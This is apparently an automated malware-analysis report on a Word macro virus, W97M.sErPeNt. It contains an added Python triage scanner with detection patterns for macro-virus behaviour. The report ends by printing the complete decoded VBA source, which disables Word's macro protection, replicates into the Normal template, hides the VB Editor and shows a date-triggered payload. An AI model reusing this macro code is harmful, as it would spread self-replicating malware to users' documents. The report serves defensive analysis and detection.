Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros, including a Document_Open handler that runs automatically when the document is opened. On open the macro sets Options.VirusProtection to 0 (disabling Word's built-in macro warning), reads its own module source through the document's VBProject, and copies it over the first code module of both NormalTemplate and the active document; this is the self-replication step of a Word macro virus, and the comments in the source name it W97M.sErPeNt. If the Normal template's first module already has the same line count as the virus, it shows a fake "Error245!" error box. It then disables the "Visual Basic Editor" entry of the Macro menu (so the user cannot inspect the code) and saves the document. On the 7th day of any month it additionally shows a message box of random characters around a Bosnian-language slogan ("When everything seems to be dying, it is actually being born!") and moves the application window around (the "D-Cross payload"). The ClamAV detection Doc.Trojan.Serpent-1 matches this family, and the behaviour is replication plus a visible payload rather than a downloaded second stage.
Heuristics (3)
- ClamAV: Doc.Trojan.Serpent-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Serpent-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro present
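The heuristics above are the kind of static checks a triage script can run over decoded VBA before any sandbox executes it. The following is an added example written for this report, not code from the analyzer, ClamAV or oletools: it scans olevba-style decoded VBA text for the behaviours this sample shows (auto-executing Document_Open, VirusProtection tampering, rewriting module source through VBProject, disabling the VB Editor menu entry, a date-based trigger), strips `'` comments so that commentary cannot trip rules, scores the result, and extracts the trigger day so a sandbox clock can be set to it. The rule names, weights and verdict logic are assumptions for illustration; the malicious sample is an excerpt of the macro listed in this report, and the benign sample is constructed.

```python
"""Heuristic triage of decoded VBA source (added example; rule names,
weights and verdict thresholds are assumptions, not the analyzer's)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Pattern, Tuple


@dataclass
class Finding:
    rule: str
    severity: str
    line_no: int
    evidence: str


# (rule name, severity, weight, pattern). VBA is case-insensitive, so every
# pattern is compiled with re.IGNORECASE. Weights are illustrative only.
RULES: List[Tuple[str, str, int, Pattern[str]]] = [
    ("VBA_AUTOEXEC_DOCOPEN", "high", 40,
     re.compile(r"\bSub\s+(Document_Open|AutoOpen|Auto_Open)\b", re.I)),
    ("VBA_DISABLE_VIRUSPROTECTION", "high", 40,
     re.compile(r"\.VirusProtection\s*=", re.I)),
    ("VBA_NORMAL_TEMPLATE_WRITE", "high", 40,
     re.compile(r"\bNormalTemplate\.VBProject\b", re.I)),
    ("VBA_VBPROJECT_ACCESS", "medium", 20,
     re.compile(r"\.VBProject\.VBComponents\b", re.I)),
    ("VBA_CODEMODULE_REWRITE", "medium", 20,
     re.compile(r"\.(InsertLines|DeleteLines|AddFromString)\b", re.I)),
    ("VBA_DISABLE_VBE_MENU", "medium", 20,
     re.compile(r'Controls\("Visual Basic Editor"\)\.Enabled\s*=\s*False', re.I)),
    ("VBA_DATE_TRIGGER", "low", 10,
     re.compile(r"\b(Day|Month|Weekday)\s*\(\s*Now\s*(\(\s*\))?\s*\)\s*=", re.I)),
]


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment, ignoring apostrophes inside "..." strings."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def scan_vba(source: str) -> List[Finding]:
    """Run every rule over every code line; one finding per rule per line."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(source.splitlines(), start=1):
        code = strip_comment(raw)
        for rule, severity, _weight, pattern in RULES:
            match = pattern.search(code)
            if match:
                findings.append(Finding(rule, severity, line_no, match.group(0)))
    return findings


def risk_score(findings: List[Finding]) -> int:
    """Count each distinct rule's weight once, however often it fired."""
    weights = {rule: weight for rule, _sev, weight, _pat in RULES}
    return sum(weights[rule] for rule in {f.rule for f in findings})


def verdict(findings: List[Finding]) -> str:
    """Auto-exec plus replication or AV tampering is the macro-virus signature."""
    rules = {f.rule for f in findings}
    replicates = {"VBA_NORMAL_TEMPLATE_WRITE", "VBA_CODEMODULE_REWRITE"} <= rules
    if "VBA_AUTOEXEC_DOCOPEN" in rules and (replicates or "VBA_DISABLE_VIRUSPROTECTION" in rules):
        return "malicious"
    return "suspicious" if rules else "clean"


def date_trigger(source: str) -> Optional[int]:
    """Return the day-of-month a 'Day(Now()) = N' check fires on, if any."""
    pattern = re.compile(r"\bDay\s*\(\s*Now\s*(\(\s*\))?\s*\)\s*=\s*(\d+)", re.I)
    for raw in source.splitlines():
        m = pattern.search(strip_comment(raw))
        if m:
            return int(m.group(2))
    return None


def triage(source: str) -> Dict[str, object]:
    findings = scan_vba(source)
    return {"verdict": verdict(findings), "score": risk_score(findings),
            "rules": sorted({f.rule for f in findings}),
            "trigger_day": date_trigger(source), "findings": findings}


# Excerpt of the macro listed in this report (the replication and trigger lines).
SAMPLE_VBA = """\
Attribute VB_Name = "Modul1"
Private Sub Document_Open(): Dim KIOXCFG, SDFHITD, GHJIDFR, LKJWERT: Set LKJWERT = ActiveDocument.VBProject.VBComponents(1).CodeModule: Const nula = 2 * 0
With Options: .VirusProtection = nula: End With
Set KIOXCFG = ThisDocument.VBProject.VBComponents(1).CodeModule
Set SDFHITD = NormalTemplate.VBProject.VBComponents(1).CodeModule
GHJIDFR = KIOXCFG.lines(1, KIOXCFG.countoflines)
With SDFHITD: .deletelines 1, SDFHITD.countoflines: .insertlines 1, QOINMV.GetText
End With
If Day(Now()) = 7 Then
End If
With CommandBars: .Item("Macro").Controls("Visual Basic Editor").Enabled = False: End With: ActiveDocument.Save
'W97M.sErPeNt bY e[ax]
End Sub
"""

# Constructed benign macro; the comment mentions NormalTemplate on purpose.
BENIGN_VBA = """\
Attribute VB_Name = "Module1"
' NormalTemplate.VBProject is never touched; comment text must not count
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        report = triage(src)
        print(name, report["verdict"], report["score"], report["trigger_day"])
        for f in report["findings"]:
            print(f"  line {f.line_no}: {f.rule} ({f.severity}) <- {f.evidence!r}")
```

The verdict rule deliberately requires an auto-execute entry point combined with either replication into NormalTemplate or AV tampering, because VBProject access or a date check on their own also appear in legitimate add-ins. Feed it the decoded output of `olevba` (the same source `oletools.olevba.extract_macros` produced for the artifact below) rather than the raw OLE stream, since the patterns assume decompressed VBA text.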
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2366 bytes | d7fea8f1fe039eb2c70a704a59473ad9740e901233b830c55754a0463458dd79 | ClamAV: Doc.Trojan.Serpent-1 | unlikely |
Preview script (first 1,000 lines of the extracted script)
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
Private Sub Document_Open(): Dim KIOXCFG, SDFHITD, GHJIDFR, LKJWERT: Set LKJWERT = ActiveDocument.VBProject.VBComponents(1).CodeModule: Const nula = 2 * 0
With Options: .VirusProtection = nula: End With
Set KIOXCFG = ThisDocument.VBProject.VBComponents(1).CodeModule
Set SDFHITD = NormalTemplate.VBProject.VBComponents(1).CodeModule
GHJIDFR = KIOXCFG.lines(1, KIOXCFG.countoflines)
If SDFHITD.countoflines = KIOXCFG.countoflines Then
MsgBox "Error245! MSWord will try to fix the problem.", vbCritical, "MSWord - error"
End If
Dim QOINMV As New DataObject: QOINMV.SetText GHJIDFR
With SDFHITD: .deletelines 1, SDFHITD.countoflines: .insertlines 1, QOINMV.GetText
End With: With LKJWERT: .deletelines 1, LKJWERT.countoflines: .insertlines 1, QOINMV.GetText
End With
If Day(Now()) = 7 Then
Dim asd As String
For l = 1 To 4
asd = Chr(Rnd * 34 + 123) & ChrW(Rnd * 100 + 23)
asd = asd & Chr(Rnd * 200 - 10): dsa = asd & Hex(234 * Rnd) & Chr(Rnd * 5 + 55)
dfg = dsa & Hex(54) & asd & dsa: h = Asc(Chr(Rnd * 123)): x = asd & dfg & dsa & h & x
Next l
MsgBox x & dsa & asd & dfg & dsa & dfg & dfg & dsa & "---> Kad sve izgleda da umire ono se ustvari radja! <---" & dsa & dfg & asd & dfg & dfg & h & asd & dfg & x, vbExclamation, asd & " BIHnet.ORG 4nD EB Vir Labs 43v3r!!! " & asd
Application.WindowState = wdWindowStateNormal
'===={ ideja za D-Cross payload: e[ax] }===
Application.Move 150, 150
Application.Caption = "...hmmm, strange!"
For c = 1 To 300
Application.Move c, c
Application.Move -c, -c
Next c
'===={ kraj kôda za D-Cross payload }======
End If
With CommandBars: .Item("Macro").Controls("Visual Basic Editor").Enabled = False: End With: ActiveDocument.Save
'W97M.sErPeNt bY e[ax]
'D-Cross payload bY e[ax]
'Greetz: k04x, rudeboy, t[r]ax, E-Man, BIGFOOOT, SnakeLord
'Vr4g, h4dija, slash ...te ostalim pri BIHnet.org
'10x to: [moebius], KnowDeth, Jackie 2Fl0wer, Psyclone X, Mist
'mort-, Nala, LifeWire, GygaByte, ^Coke, Fulvian, VirusBuster
'...and to VicodinES (Once again God Bless tha Poppy!)
End Sub
```